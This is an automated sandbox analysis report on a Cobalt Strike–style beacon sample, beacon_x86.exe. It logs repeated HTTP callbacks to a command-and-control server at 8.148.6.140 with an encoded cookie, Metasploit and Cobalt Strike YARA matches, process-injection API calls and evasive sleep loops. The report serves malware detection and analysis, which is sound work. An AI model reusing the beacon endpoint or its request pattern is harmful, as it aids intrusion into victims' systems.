        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: beacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get
        Source: beacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get%
        Source: beacon_x86.exe, 00000001.00000003.2770287590.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getBase
        Source: beacon_x86.exe, 00000001.00000002.3879604873.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/gety
        Source: beacon_x86.exe, 00000001.00000002.3879604873.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getyU

        System Summary

        barindex
        Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6C3DF GetCurrentProcess,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,1_2_00D6C3DF
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6C320 GetCurrentProcess,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,1_2_00D6C320
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6C669 GetCurrentProcess,NtCreateThreadEx,CreateThread,CreateRemoteThread,1_2_00D6C669
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D63A7E CreateProcessAsUserA,CreateProcessA,GetLastError,1_2_00D63A7E
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D840D11_2_00D840D1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D848FD1_2_00D848FD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D838281_2_00D83828
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D749E91_2_00D749E9
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D871901_2_00D87190
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D869451_2_00D86945
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D86BC01_2_00D86BC0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D863201_2_00D86320
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D844DD1_2_00D844DD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D83CFD1_2_00D83CFD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D79DDB1_2_00D79DDB
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_03E100001_2_03E10000
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: String function: 00D7A3A4 appears 39 times
        Source: beacon_x86.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: classification engineClassification label: mal96.troj.evad.winEXE@1/0@0/1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D631CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00D631CB
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D694E3 _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,1_2_00D694E3
        Source: beacon_x86.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\beacon_x86.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: beacon_x86.exeReversingLabs: Detection: 94%
        Source: beacon_x86.exeVirustotal: Detection: 79%
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D611D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00D611D8
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_008114CD push esp; ret 1_3_008114D5
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_008112D8 push esp; retf 1_3_008112F1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_008139F6 push esp; retf 1_3_008139FD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_0081423F push esi; ret 1_3_00814248
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_3_00810366 push cs; ret 1_3_00810372
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D76ABC push edi; ret 1_2_00D76ABD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D7A3E9 push ecx; ret 1_2_00D7A3FC
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D775D0 push eax; ret 1_2_00D775D7
        Source: C:\Users\user\Desktop\beacon_x86.exeWindow / User API: threadDelayed 4868Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeWindow / User API: threadDelayed 4988Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-21389
        Source: C:\Users\user\Desktop\beacon_x86.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-21162
        Source: C:\Users\user\Desktop\beacon_x86.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-20847
        Source: C:\Users\user\Desktop\beacon_x86.exeAPI coverage: 8.7 %
        Source: C:\Users\user\Desktop\beacon_x86.exe TID: 7780Thread sleep count: 4868 > 30Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exe TID: 7780Thread sleep time: -48680000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exe TID: 7780Thread sleep count: 4988 > 30Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exe TID: 7780Thread sleep time: -49880000s >= -30000sJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\beacon_x86.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\beacon_x86.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D64225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,1_2_00D64225
